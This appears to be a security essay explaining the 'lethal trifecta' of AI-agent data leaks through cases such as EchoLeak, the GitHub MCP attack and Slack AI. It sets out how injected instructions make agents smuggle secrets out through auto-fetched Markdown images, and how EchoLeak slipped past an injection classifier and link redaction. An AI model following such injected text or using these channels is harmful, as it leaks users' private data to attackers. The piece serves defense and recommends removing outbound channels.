Line up the AI-agent data breaches of the last two years — EchoLeak in Microsoft 365 Copilot, the GitHub MCP repo leak, Slack AI spilling private channels, Google Bard exfiltrating chat history — and a strange thing happens. They stop looking like a list of separate vulnerabilities and start looking like one bug, shipped over and over by different companies.
Simon Willison gave that bug a name in June 2025: the lethal trifecta. An agent is exposed the moment it combines three capabilities — access to private data, exposure to untrusted content, and the ability to communicate externally. Each is harmless alone. Together they are a loaded gun, and prompt injection is the trigger.
Why this reframing matters
The instinctive way to describe these incidents is "the AI got tricked." That framing is a dead end, because every model is trickable. You cannot ship your way to a model that reliably distinguishes its operator's instructions from instructions hidden inside the content it was asked to read — the two arrive as the same undifferentiated tokens.
The trifecta moves the blame from the model to the architecture. The model's gullibility is a constant. What varies between a safe agent and a breached one is whether the product wired up an exfiltration path. And here is the part that surprises people: the path is almost never a menacing send_http_request tool. It is usually a rendering primitive nobody thinks of as dangerous.
Data exfiltration in AI agents is a rendering problem wearing an AI costume.
Willison spells out the mechanism: "If a tool can make an HTTP request — to an API, or to load an image, or even providing a link for a user to click — that tool can be used to pass stolen information back to an attacker." The attacker's injected instruction tells the agent to embed your secret in the query string of a Markdown image. The chat client dutifully fetches that image to display it. The secret is now a line in the attacker's web-server log. No click required.
The same exploit, five times
The receipts are remarkably consistent. In 2023, Johann Rehberger showed Google Bard leaking a user's chat history through exactly this image-Markdown channel, fed by an indirect injection planted in a shared Google Doc. In 2024, PromptArmor demonstrated Slack AI leaking the contents of private channels: an attacker posted instructions in a public channel, and a victim's assistant later executed them, rendering the stolen data into a link.
Then came the production-grade ones. EchoLeak (CVE-2025-32711, CVSS 9.3), found by Aim Security, was the first real-world zero-click prompt-injection exfiltration: a single crafted email could make Microsoft 365 Copilot read internal data and leak it with no user interaction at all. Tellingly, its chain defeated multiple defenses — it slipped past Microsoft's cross-prompt-injection classifier, dodged link redaction using reference-style Markdown, abused auto-fetched images, and routed the data through a Microsoft Teams proxy that the content-security-policy already trusted.
Invariant Labs' GitHub MCP attack is the cleanest textbook case. A malicious GitHub issue filed in a public repo hijacks a user's agent, which then reads the user's private repos and leaks their contents by opening a public pull request. Invariant was blunt that this "is not a flaw in the GitHub MCP server code itself, but rather a fundamental architectural issue" — there is no server-side patch, because all three legs of the trifecta are present by design. (For the adjacent supply-chain angle, see MCP tool poisoning and rug pulls.)
Why "just detect it" keeps failing
Vendors respond to each incident with a better classifier, and researchers respond with a new bypass, and the cycle never converges. Willison explains why with a line worth taping to your monitor: "in security, 99% is a failing grade." A detector that catches 99% of injections sounds great until you remember the attacker only needs the 1%, and has infinite tries to find it. EchoLeak walking through a dedicated XPIA classifier is that principle made concrete.
This is the same lesson the industry already learned with prompt injection generally: probabilistic filters are a speed bump, not a wall. The OWASP Top 10 for LLM Applications codifies the two halves of the trifecta as LLM01 (prompt injection) and LLM02 (sensitive information disclosure), and notably does not promise a detector that closes them.
What actually works: remove a leg
If the disease is the combination, the cure is subtraction. Look at the three ingredients and ask which you can remove:
- Private data access — rarely removable. Reading your data is usually the whole point of the agent.
- Untrusted content — rarely removable. An agent that can't read the outside world is barely an agent.
- The outbound channel — this is the one you can cleanly take away.
So the highest-leverage hardening is unglamorous: allowlist outbound domains, disable auto-fetched images and arbitrary link rendering, and put a human approval step in front of consequential actions. Invariant's own advice for the GitHub case — least-privilege tokens, one resource per session — is the same move applied to the data leg.
For teams that need a guarantee rather than a mitigation, the frontier is design-level defense. Willison's 2023 Dual LLM pattern keeps a privileged model away from untrusted content entirely; a quarantined model reads the untrusted text but can't call tools. Google DeepMind's CaMeL ("Defeating Prompt Injections by Design") generalizes this, attaching capability metadata to every value so injected instructions structurally can't reach a privileged action or an egress path. CaMeL's reported numbers are partial, not perfect — but they are a different kind of number than a classifier's accuracy: a guarantee-shaped one, not a cat-and-mouse one.
That is the real shift underway. The industry is mid-pivot from "detect the attack," which it keeps losing, to "deny the capability," which it can actually reason about. The lethal trifecta is the map for that pivot: you don't have to make your agent unfoolable. You just have to make sure that when it is fooled — and it will be — there's no door left open for the data to walk out of. For the broader threat model these attacks live inside, see the OWASP Top 10 for LLM applications.



